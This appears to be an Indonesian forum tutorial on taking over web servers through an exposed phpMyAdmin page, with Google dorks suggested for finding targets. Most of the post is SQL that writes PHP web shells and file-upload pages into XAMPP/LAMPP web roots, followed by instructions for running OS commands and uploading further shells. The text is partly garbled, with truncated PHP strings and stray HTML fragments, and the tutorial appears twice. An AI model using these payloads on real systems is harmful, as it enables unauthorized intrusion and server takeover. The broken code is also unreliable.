halaman phpmyadmin biasa ada di http://www.situs.com/phpmyadmin
atau bisa dicari dengan dork google
[URL=http://s1375.photobucket.com/user/monroelou7/media/login_zps4c6f7620.jpg.html][IMG]http://i1375.photobucket.com/albums/ag457/monroelou7/login_zps4c6f7620.jpg[/IMG][/URL]
Kemudian masukkan script SQL pada form yang tersedia :
untuk sistem operasi Unix :[spoiler]
[code]DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('"; system($cmd); echo "
"; exit; } ?>');
SELECT * INTO OUTFILE '[color=#FF4500]/opt/lampp/htdocs/cmd.php[/color]' from temptab;
DROP TABLE temptab;
FLUSH LOGS;[/code]
[/spoiler]
untuk sistem operasi windows :[spoiler]
[code]DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('"; system($cmd); echo ""; exit; } ?>');
SELECT * INTO OUTFILE '[color=#FF4500]C:/xampp/htdocs/cmd.php[/color]' from temptab;
DROP TABLE temptab;
FLUSH LOGS;[/code][/spoiler]
KLIK GO !!
Note : maksud dari kode berwarna merah adalah jika XAMPP terinstall di direktori lain. silahkan ganti yang berwarna merah sesuau dengan direktori XAMPP target
Your SQL Query has been executed successful
lanjutkan ke step berikutnya
Itu artinya kita udah bisa membuka file cmd.php, silahkan buka http://localhost/cmd.php?cmd=Masukkan perintah OS (Linux atau Windows)
Contoh : [color=#FF0000]http://localhost/cmd.php?cmd=ls[/color] <-- adalah="" br="" dan="" di="" dir.="" direktori="" file="" isi="" kalo="" linux="" ls="" mesin="" ngeliat="" pake="" perintah="" untuk="" windows="" ya="">
Langsung aja kita buka PhpMyAdminnya, kemudian pilih menu SQL
Kemudian masukkan script SQL pada form yang tersedia :
*Untuk mesin Linux[spoiler]
[code]DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values (' '); SELECT * INTO OUTFILE '/opt/lampp/htdocs/form.php' from temptab; DROP TABLE temptab; FLUSH LOGS;[/code][/spoiler] *Untuk mesin Windows[spoiler] [code]DROP TABLE IF EXISTS `temptab`; CREATE TABLE temptab (codetab text); INSERT INTO temptab (codetab) values (' '); SELECT * INTO OUTFILE 'C:/xampp/htdocs/form.php' from temptab; DROP TABLE temptab; FLUSH LOGS;[/code][/spoiler] Dan kemudian Klik Go! Ulangi lagi kita buka PhpMyAdminnya, kemudian pilih menu SQL Kemudian masukkan script SQL pada form yang tersedia : *Untuk mesin Linux[spoiler] [code]DROP TABLE IF EXISTS `temptab`; CREATE TABLE temptab (codetab text); INSERT INTO temptab (codetab) values ('";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print " ";?>'); SELECT * INTO OUTFILE '/opt/lampp/htdocs/upload.php' from temptab; DROP TABLE temptab; FLUSH LOGS;[/code][/spoiler] *Untuk mesin Windows[spoiler] [code]DROP TABLE IF EXISTS `temptab`; CREATE TABLE temptab (codetab text); INSERT INTO temptab (codetab) values ('";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print " ";?>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/upload.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;
[/code][/spoiler]
Dan kemudian Klik Go!
Ane anggep sukses, sekarang buka http://localhost/form.php
[URL=http://s1375.photobucket.com/user/monroelou7/media/upload_zps579949bf.jpg.html][IMG]http://i1375.photobucket.com/albums/ag457/monroelou7/upload_zps579949bf.jpg[/IMG][/URL]
Silahkan di upload Shellnya atau file .php, .html, .htm, .txt, dan lain sebagainya. -->
atau bisa dicari dengan dork google
[URL=http://s1375.photobucket.com/user/monroelou7/media/login_zps4c6f7620.jpg.html][IMG]http://i1375.photobucket.com/albums/ag457/monroelou7/login_zps4c6f7620.jpg[/IMG][/URL]
Kemudian masukkan script SQL pada form yang tersedia :
untuk sistem operasi Unix :[spoiler]
[code]DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('"; system($cmd); echo "
"; exit; } ?>');
SELECT * INTO OUTFILE '[color=#FF4500]/opt/lampp/htdocs/cmd.php[/color]' from temptab;
DROP TABLE temptab;
FLUSH LOGS;[/code]
[/spoiler]
untuk sistem operasi windows :[spoiler]
[code]DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('"; system($cmd); echo ""; exit; } ?>');
SELECT * INTO OUTFILE '[color=#FF4500]C:/xampp/htdocs/cmd.php[/color]' from temptab;
DROP TABLE temptab;
FLUSH LOGS;[/code][/spoiler]
KLIK GO !!
Note : maksud dari kode berwarna merah adalah jika XAMPP terinstall di direktori lain. silahkan ganti yang berwarna merah sesuau dengan direktori XAMPP target
Your SQL Query has been executed successful
lanjutkan ke step berikutnya
Itu artinya kita udah bisa membuka file cmd.php, silahkan buka http://localhost/cmd.php?cmd=Masukkan perintah OS (Linux atau Windows)
Contoh : [color=#FF0000]http://localhost/cmd.php?cmd=ls[/color] <-- adalah="" br="" dan="" di="" dir.="" direktori="" file="" isi="" kalo="" linux="" ls="" mesin="" ngeliat="" pake="" perintah="" untuk="" windows="" ya="">
Langsung aja kita buka PhpMyAdminnya, kemudian pilih menu SQL
Kemudian masukkan script SQL pada form yang tersedia :
*Untuk mesin Linux[spoiler]
[code]DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values (' '); SELECT * INTO OUTFILE '/opt/lampp/htdocs/form.php' from temptab; DROP TABLE temptab; FLUSH LOGS;[/code][/spoiler] *Untuk mesin Windows[spoiler] [code]DROP TABLE IF EXISTS `temptab`; CREATE TABLE temptab (codetab text); INSERT INTO temptab (codetab) values (' '); SELECT * INTO OUTFILE 'C:/xampp/htdocs/form.php' from temptab; DROP TABLE temptab; FLUSH LOGS;[/code][/spoiler] Dan kemudian Klik Go! Ulangi lagi kita buka PhpMyAdminnya, kemudian pilih menu SQL Kemudian masukkan script SQL pada form yang tersedia : *Untuk mesin Linux[spoiler] [code]DROP TABLE IF EXISTS `temptab`; CREATE TABLE temptab (codetab text); INSERT INTO temptab (codetab) values ('";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print " ";?>'); SELECT * INTO OUTFILE '/opt/lampp/htdocs/upload.php' from temptab; DROP TABLE temptab; FLUSH LOGS;[/code][/spoiler] *Untuk mesin Windows[spoiler] [code]DROP TABLE IF EXISTS `temptab`; CREATE TABLE temptab (codetab text); INSERT INTO temptab (codetab) values ('";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print " ";?>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/upload.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;
[/code][/spoiler]
Dan kemudian Klik Go!
Ane anggep sukses, sekarang buka http://localhost/form.php
[URL=http://s1375.photobucket.com/user/monroelou7/media/upload_zps579949bf.jpg.html][IMG]http://i1375.photobucket.com/albums/ag457/monroelou7/upload_zps579949bf.jpg[/IMG][/URL]
Silahkan di upload Shellnya atau file .php, .html, .htm, .txt, dan lain sebagainya. -->